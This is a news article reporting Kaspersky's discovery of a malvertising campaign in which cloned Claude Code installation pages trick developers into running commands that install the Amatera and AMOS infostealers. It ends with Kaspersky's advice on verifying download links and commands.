Kaspersky warns of AI tool malware campaign

Kaspersky Threat Research said it uncovered in March 2026 a new malware campaign targeting developers searching online for installation instructions for Claude Code, an AI development agent created by Anthropic.

According to the cybersecurity company, users who search for “Claude Code download” may encounter sponsored advertisements placed at the top of search results.

Kaspersky said one of those ads redirects users to a malicious webpage designed to closely imitate the official installation documentation for Claude Code.

The company said the scheme tricks users into installing malware that harvests sensitive information, including credentials, cryptocurrency wallet data, browser sessions and other confidential files.

Kaspersky said similar malicious campaigns also imitate other popular AI tools, including OpenClaw.

The fake documentation page is visually identical to the legitimate one and is hosted on Squarespace, a website-building and hosting platform, according to Kaspersky.

Because the fraudulent page precisely copies the original instructions, users may not immediately spot the deception when copying and executing installation commands, the company said.

Instead of installing the developer tool, Kaspersky said the commands deliver malware to the victim’s system.

On Windows systems, the malicious commands install Amatera, an information-stealing malware that collects data from user directories, web browsers and cryptocurrency wallets before transmitting the stolen information to a remote server, according to Kaspersky.

Kaspersky said Amatera has previously appeared in campaigns using the ClickFix distribution technique and is operated under a Malware-as-a-Service, or MaaS, model.

On macOS systems, the commands install AMOS, another infostealer that Kaspersky said has been documented in several malware campaigns targeting Apple devices.

Kaspersky researchers said they also found similar malicious campaigns aimed at other widely used AI tools, including OpenClaw and Doubao.

Using the same approach, attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for those tools, Kaspersky said.

“The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools,” comments Vladimir Gursky, cybersecurity expert at Kaspersky.

The warning highlights a growing risk around AI-assisted coding tools, which are increasingly used in software development workflows and can provide attackers with a direct path to corporate systems, source code and sensitive credentials if compromised.

Kaspersky linked the newly identified activity to a broader trend in which threat actors exploit users’ trust in search advertising, cloned websites and familiar brand interfaces to distribute malware.

The company said it had previously detected a related tactic in December 2025, when attackers used Google Ads to spread a macOS infostealer.

In that earlier case, Kaspersky said a specially generated chat interface made to resemble a ChatGPT tutorial pretended to guide users through installing the Atlas Browser.

The malicious instructions in that campaign appeared to be hosted on a legitimate site associated with OpenAI, Kaspersky said, helping attackers gain users’ trust.

To reduce the risk of infection, Kaspersky advised users to carefully verify download links and make sure they point to official project websites.

The company also urged developers to review any command-line instructions before executing them, especially if those commands are copied from external sources.

Kaspersky said users should avoid following guides they did not specifically request or do not fully understand.

The company added that reliable endpoint security solutions capable of detecting and blocking infostealers and malicious downloads remain an important layer of defense.